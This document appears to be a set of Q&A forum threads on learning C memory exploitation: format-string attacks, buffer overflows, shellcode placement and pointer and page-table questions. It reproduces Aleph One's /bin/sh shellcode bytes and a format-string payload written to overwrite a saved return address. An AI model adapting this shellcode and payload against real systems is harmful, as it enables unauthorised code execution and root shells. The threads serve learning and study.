I'm running this in an environment with stack randomization disabled, and using the gcc version compatible with AlephOne's buffer overflow - that works great!
I'm trying to overwrite the instruction pointer register (eip) with the address of the array containing my shellcode. I always end up with segmentation fault though. The following is a snippet I'm trying to exploit:
//Prints version
static
void print_version(char* cmd)
{
char txt[640+1];
snprintf(txt, 640, "Submission program version 0.1 (%s)\n", cmd);
printf(txt);
}
I'm calling this function through execve(). The format string is the argv[0] here, which is successfully passed to the function above.
I'm having this format string:
\x0c\xdc\xbf\xffjunk\x0d\xdc\xbf\xffjunk\x0e\xdc\xbf\xffjunk\x0f\xdc\xbf\xff%8x%8x%120x%n%5x%n%230x%n%64x%n
followed by 200 NOPs, shellcode and remaining array with the NOPs as well.
The shellcode is Aleph One's code:
static char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
Going back to the format string, I'm overwriting 4 addresses 0xffbfdc0c to 0xffbfdc0f. 0xffbfdc0c is the saved eip address I found by setting a break point on print_version() function mentioned at the top.
I'm trying to replace it with the address 0xffbfdcd4, which is 150 bytes above the base address for txt[] array in print_version (counting the initial characters of the txt[] in the function and format string after that, hoping it may land somewhere in the NOPs preceding the shellcode).
I just end up with a SEG fault. I'm not sure how to proceed further or how I should debug to see if it's actually overwriting the value at the intended address.
EDIT: Am I using the correct format string?
Could anyone also tell me how to check the address using gdb after my program has generated a segment fault or right before a seg fault but after change of address?
Thanks.
A few things.. you state that your format string is argv[0]. Are you sure you didn't mean argv[1]? argv[0] is typically reserved for the program name, argv[1] being the first argument to the program.
You can examine the address after the right by setting a breakpoint before the right occurs and immediately after, and then using x/x 0xffbfdc0c to see if you're writing to the correct location. The GDB manual (available online) may be helpful to you as well.
The neat thing about format string writes are that you're not limited to where you can write, so anything is free game (hint hint). You might want to make sure that -D_FORITY_SOURCE isn't being set when you compile your program as well.
Related
I have two questions related to C programming and shellcoding (assembly) following below.
Question 1: Can anyone provide an answer on why putting two shellcodes in one program wouldn't work? I know it's related to the memory region but I need to know the exact reason. Program is compiled using gcc with the -zexecstack and -fno-stack-protector options.
#include <stdio.h>
#include <string.h>
main(int argc, char *argv[])
{
unsigned char shellcode[] = "\x01\x02<SHELLCODE>";
/* if the below line is uncommmented it will result in segault */
/* unsigned char shellcode_[] = "\x01\x02<SHELLCODE>"; */
int (*ret)() = (int(*)())shellcode;
return 0;
}
So how would it be possible to divide multiple shellcodes into different memory regions and call them without them interrupting the execution flow between each other, and decide which one to call? (I mean just STORE two shellcodes, not RUN them simultaneously, if that's possible at all).
Question 2: if the shellcode has to be passed as a parameter to a function, what would be the proper way to do it?
Pseudocode:
unsigned char shellcode[] = "\x01\x02...";
void call_shellcode(unsigned char shellcode[200]);
main()
{
call_shellcode(shellcode);
}
void call_shellcode(unsigned char shellcode[200])
{
... print/call shellcode
}
UPDATE: As there seems to be some misunderstanding to the question, this is not the ACTUAL shellcode. I do know what shellcode is and how it is generated, and how it works. I have not provided an actual shellcode within the C stub to leave it in a readable state. The value "\x01\x01" is a pseudo code to point to the idea of the question and NOT any actual contents.
Your shellcode cannot possibly work for a very simple reason: it begins with \x01\x02:
unsigned char shellcode[] = "\x01\x02<SHELLCODE>";
I'm not sure why your think your shellcode has to begin with those two bytes: it really doesn't!
Those two bytes decode to add DWORD PTR [rdx],eax (or edx if running in 32-bit mode). Since you do not have any control over the value of RDX/EDX at the time your shellcode is called, it will very likely immediately cause a segmentation fault because RDX/EDX does not contain a valid (and writable) memory address.
Changing literally anything around the shellcode, in the function or outside, could cause the compiler to choose a different register allocation that will result in RDX/EDX having a good value at runtime that doesn't result in a crash, but that'd just be a lucky coincidence. Writing and using shellcode like this is inherently undefined behavior, or at least implementation defined (fixed an operating system and compiler) so extra care must be taken.
So how would it be possible to divide multiple shellcodes into different memory regions and call them without them interrupting the execution flow between each other, and decide which one to call?
Well, you're not really dividing anything in "different memory regions"... whether you use one array or two or ten, they are all declared on the stack and they will be close together on the stack.
If you want to jump from one to the other, that's going to be a complex task, because in general you do not know the location of a variable on the stack beforehand, so you will have to do some math calculating your current location and then the offset from one shellcode chunk to the other, ultimately performing a relative call/jump.
If shellcode has to be passed as a parameter to a function what would be the proper way to do this?
The proper way is to mmap a region of memory that is RWX, write the shellcode into it (memcpy, read from stdin, etc.) and then pass a pointer to that memory region to the function you want. You have no guarantee that a piece of global data will be put by the compiler in an executable memory region. In fact, no modern day compiler would do that, and furthermore, no modern day kernel would map such a region as executable even if the ELF is compiled with -z execstack.
In recent kernels -z execstack is only respected for the stack itself, so passing a shellcode as function argument through a variable will only work if the variable was defined on the stack.
You can't have two variables with the same name in the same scope (this part has nothing to do with what the variables are or how they are used). Simply give the second shellcode a different name.
Note I am not going to comment at all on what you are trying to do, other than that I would not think of manually created machine code as "shell code" (which I would usually think of as code intended for a command shell like bash).
I have exploitable c code which takes user input. I am able to print out contents of the stack using %10$p which prints out the 10th value stored on the stack. However when I try to run the same program but with %10$n it segfaults. Which does not make sense. Segfaults means I am trying to access memory that does not belong to me. However, this memory does 'belong to me' since I can print it out. Why does this happen?
Unfortunately, I cannot postcode for it because it is for an assignment. So I have to keep this question abstract.
%10$n means write the number of characters printed to the address pointed to by the 10th element on the stack, not the actual 10th element of the stack. This means that if the 10th element doesn't point to valid, writable memory, which it likely doesn't, then you will segfault upon trying to write to it.
I have this two programs just for understanding how pointers work. The first one is named test.c and here is the code.
#include <stdio.h>
#include <stdlib.h>
int main(void)
{
int *mem = malloc(sizeof(int) * 1);
*mem = 90;
//free(mem);
printf("%p", mem);
return (0);
}
so basically what I have is a program that allocates a place for one integer then prints that address to the standard output. In the commented section I am freeing the allocated memory after assigning a value. I will talk about why I commented it later. Here is my second code. It is in a file called test1.c. And here is the code,
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char** argv)
{
int num = (int)strtol(argv[1], NULL, 16);
int *mem = (void *)(long)num;
printf("at test1 string> %s, changed to pointer-->%p, after being dereferenced-->%i\n",argv[1], mem, *mem);
return (0);
}
In this second program, an input is taken from the command line and then it is changed to a pointer (an address). It assumes what is passed is a hex string. What it does, is just to print the memory address passed and then try to get the value at that address.
What I did next is to compile each file to test and test1 respectively using gcc (I am using linux) and run the following command ./test | xargs ./test1 and this gives me the following error xargs: ./test1: terminated by signal 11. I have understood that this is because of the segmentation fault test1 is raising because if I don't try to dereference the pointer I don't get this error. But I don't understand why I am getting a seg fault. even after I free the memory (uncomment the comment in the first program) I still get a segmentation fault. I was expecting to get some garbage value rather than a seg fault.I am getting started with this whole process and pointer thing so for sure there is something I am missing, I hope someone will explain or direct me to a resource.
To just reprahse my question, how can a program access a specific memory without allocating it?
You can't.
Memory address are divided into pages (usually 4096 bytes). When you access an address, the CPU looks up the page with that address in the process's "page table". This table says where in physical memory (i.e. "which RAM chip") that address is.
So you cannot access addresses that aren't in your process's page table. Full stop.
How do you get pages added to your page table? You ask the OS. On Windows the function is called VirtualAlloc. On Linux it's called mmap. Or, you use a function like malloc, which lets you allocate only a small part of a page (by splitting up the pages it gets from the OS).
Also, every process has a different page table. So the addresses mean different things in different processes. Maybe the test process could have a page table entry for page 0x12345000, but the test1 process doesn't, because they're completely different tables. This is why it doesn't make sense to send pointers from one process to another.
In the old days of computing, there were no page tables and pointers were actual RAM addresses, but those days are long gone.
Edit: You can also ask the OS to put the same page in two different processes' page tables at the same time - this is called shared memory.
So if I understand what you are doing, you're printing the address of a dynamically allocated block of memory from one program, cutting and pasting that as input to a second program, which then tries to access that address.
There are several reasons why this won't work.
First is what user253751 points out - addresses don't map across different processes. 0x1234 in process A maps to a different physical memory cell than 0x1234 in process B. There are ways of setting up shared memory between running processes, but it's a bit more work than this.
Secondly, you're using the wrong types. An int is not large enough to store a pointer value - after casting and assigning the result of strtol to num you've certainly lost some digits, so casting that back to a pointer won't get you the right address.
The types intptr_t and uintptr_t in stddef.h are integer types large enough to store pointer values, but their implementation is optional, and it's still not a sure bet that strtol can accurately convert the input value.
While user253751 has given a good technical explanation, i want to put it more beginner-friendly:
Your OS makes sure one process cannot access the memory of another one as this would mean that you could manipulate or destroy other programs or steal their data (passwords, for example).
The C language does not check pointers, so you can set them to whatever you want, but if you want to access this address, the OS is stopping you because it has security features.
I'm learning various exploits and I can't quite get my head around Format String exploits. I've got a fairly simple program set up in an environment that allows the exploit.
int woah(char *arg){
char buf[200];
snprintf(buf, sizeof buf, arg);
return 0;
}
I'm able to control the arg being passed into the function which will be how the attack will happen with the end result of the program running my shellcode and giving me root. Making the program crash is easy, just feed it "%s%s" and it segfaults. We want to do more than that so we feed it something like "AAAA%x%x%x%x%x%x%x". Looking at the program in gdb we look at the buffer right after the snprinf and we can see:
"AAAA849541414141353934....blah blah blah"
That's good! We can see see the A's on the stack as well as the 41s which is A in hex. But then what comes next? I get that the general idea here is to overwrite the instruction pointer with four bytes by having the address at the start of our string that we feed in.....and then somewhere along the line we have it pointing to our shellcode.
How would I find the address of the seip/return address to overwrite?
When snprintf() is called, a stack frame - memory region - is created to execute it's function statements. However, before this happens, the compiler needs to know the previous caller of the function - return point address. This address is included in the stack frame so when the stack frame unwinds, that is the function is finishing up its work, it has go back to that address so the program can continue to run. What you are trying to do is overwrite this address with your shellcode address. Research more on stack frames, ESP, EBP, EIP to get the idea.
This question is about the exploit for the program notesearch on pg 121 of the book Hacking: Art of Exploitation 2nd Edition.
There is something I do not understand in the exploit:
When the System executes the ./notesearch 'xyz....' the argument
'xyz...' overflows the string buffer in the child program thereby
overwriting the return address....that much is clear.
The assumption here is that the notesearch program's stack frame comes ontop of the calling exploit's Stack frame. This holds true when the compiled versions exist on the same system.
My first question is 1. Will this work even as a remote hack?
My second question is
2. Since the buffer has been used to overwrite all variables including and beyond the return address, how does the notesearch program work as intended?
Variables like "printing" etc which sit in this stackframe and decide whether messages are printed or not all seem to work fine.
Even though the calling functions sit ontop of the relevant stackframe, where the string buffer which is being flooded sits, there are certain key variables whioch would have been overwritten.
Question no. 3.
Given that String buffer is part of a new stack frame pushed in after execution of notesearch starts, the buffer overwrites all the given variables in that notesearch program. Also the buffer is the value for the search string. By the program logic since the search string does not match with message, the program should not output details of the User messages. In this case, the messages appear. I want to know why?
(For reference: the book is http://www.tinker.tv/download/hacking2_sample.pdf and the code is downloadable for free from http://www.nostarch.com/hacking2.htm.)
Keep reading the book; another example is given on page 122, and then there's plenty of explanatory text that tells all about the exploits.
Here's the relevant part of notesearch's code:
int main(int argc, char *argv[]) {
int userid, printing=1, fd; // file descriptor
char searchstring[100];
if(argc > 1) // If there is an arg
strcpy(searchstring, argv[1]); // that is the search string
else // otherwise
searchstring[0] = 0; // search string is empty
userid = getuid();
fd = open(FILENAME, O_RDONLY); // open the file for read-only access
You wrote:
The assumption here is that the notesearch program's stack frame comes ontop of the calling exploit's Stack frame.
No, that's wrong. There is only one stack frame that's relevant here: the stack frame of the main() function in notesearch. The fact that we invoke ./notesearch xyz... via a system() call inside exploit_notesearch is irrelevant; we could just as well invoke ./notesearch xyz... directly on the bash command line, or trick some other process (such as, you know, bash) into executing it on our behalf.
Will this work even as a remote hack?
Of course.
Since the buffer has been used to overwrite all variables including and beyond the return address, how does the notesearch program work as intended?
Well, it doesn't really work as intended. Look at the output again:
reader#hacking:~/booksrc $ gcc exploit_notesearch.c
reader#hacking:~/booksrc $ ./a.out
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
sh-3.2#
Giving you a shell clearly doesn't count as "working as intended". But even before that, the program claims to find notes for userid 999 in /var/notes, which might indicate that it's a little bit confused. In our role as the malicious hacker, we don't care about this garbage output from the notesearch program; all we care about is that it eventually reaches the end of main() and returns to our shellcode, giving us access to the shell.
But, if you're wondering how we managed to overwrite the return address without overwriting local variables userid, printing, and fd, there are at least three obvious possibilities:
A. Maybe those variables are allocated below searchstring on the stack.
B. Maybe those variables are allocated in registers instead of on the stack.
C. Overwhelmingly likely, those variables are being overwritten, but their initial values simply don't matter to the program. For example, userid can get any value at all, because that garbage value will immediately be overwritten with getuid() on the next line. The only variable whose initial value matters is printing. And even printing changes the behavior of the program only if it happens to get the value 0 — and it can't get the value 0, because the data we're copying in consists entirely of non-zero bytes, by design.
I think you don't really understand what is buffer overflow. That searchstring variable is originally located on stack for 100 bytes. Now you are copying a large chunk of buffer into searchstring without checking the length of it. Therefore the buffer overflows to other parts of the stack frame of the notesearch's main function. The return address is also overwritten. That's how it works.
I think that the most important assumption here is that the notesearch stack is similar to that of exploit_notesearch. That is why he uses an exploit_notesearch local variable (unsigned int i) to calculate ret. He assumes (of course, knowing the source code of notesearch) that when both programs are loaded in memory they will have similar frame addresses (around 0xffff7..)
Of course, the 2 programs does not share memory, they are different processes.